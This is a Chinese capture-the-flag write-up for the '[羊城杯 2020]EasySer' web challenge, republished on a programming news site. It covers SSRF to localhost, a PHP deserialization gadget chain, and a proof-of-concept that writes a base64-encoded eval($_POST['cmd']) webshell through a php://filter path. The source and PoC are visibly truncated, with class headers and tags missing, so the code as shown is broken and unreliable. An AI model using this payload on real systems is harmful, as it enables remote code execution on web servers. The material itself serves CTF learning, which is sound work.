返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >[羊城杯 2020]EasySer
  • 357
分享到

[羊城杯 2020]EasySer

php网络安全web安全 2023-08-31 15:08:29 357人浏览 独家记忆
摘要

目录 信息搜集 代码审计 参数扫描 信息搜集 先扫下目录 .htaccess;robots.txt;flag.PHP;index.php 在robots.txt下看到了/star1.php 进入star1.php发现出现ser

目录

信息搜集

代码审计

参数扫描


信息搜集

先扫下目录

.htaccess;robots.txt;flag.PHP;index.php

在robots.txt下看到了/star1.php

进入star1.php发现出现ser.php

直接进入ser.php发现进不去,看来需要用上面提到的不安全协议,从他家,我们看到提示给的是百度的地址,考虑访问内网地址127.0.0.1,横向穿透.利用 SSRF 才能访问到 ser.php

?path=Http://127.0.0.1/ser.php

拿到ser.php源码

hero = new Yasuo;    }    public function __toString(){        if (isset($this->hero)){            return $this->hero->hasaki();        }else{            return "You don't look very happy";        }    }}class Yongen{ //flag.php    public $file;    public $text;    public function __construct($file='',$text='') {        $this -> file = $file;        $this -> text = $text;            }    public function hasaki(){        $d   = '';        $a= $d. $this->text;         @file_put_contents($this-> file,$a);    }}class Yasuo{    public function hasaki(){        return "I'm the best happy windy man";    }}?>

代码审计

创建一个GWHT对象,hero为yongen对象,然后向file写入一句话木马

  • 通过 类GWHT 的 __toString() 来调用 类Yongen 的 hasaki() 方法,利用 file_put_contents() 来写文件。其中写文件时需要绕过,先去除标签再base64解码的方法。

poc

hero = new Yongen();$door->hero->file = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php';$door->hero->text = 'PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==';echo urlencode(serialize($door));?>

 

用蚁剑连接shel.php,flag 在根目录下

参数扫描

arjun扫描传入的参数为c和path

来源地址:https://blog.csdn.net/qq_63701832/article/details/128766325

--结束END--

本文标题: [羊城杯 2020]EasySer

本文链接: https://lsjlt.com/news/386015.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作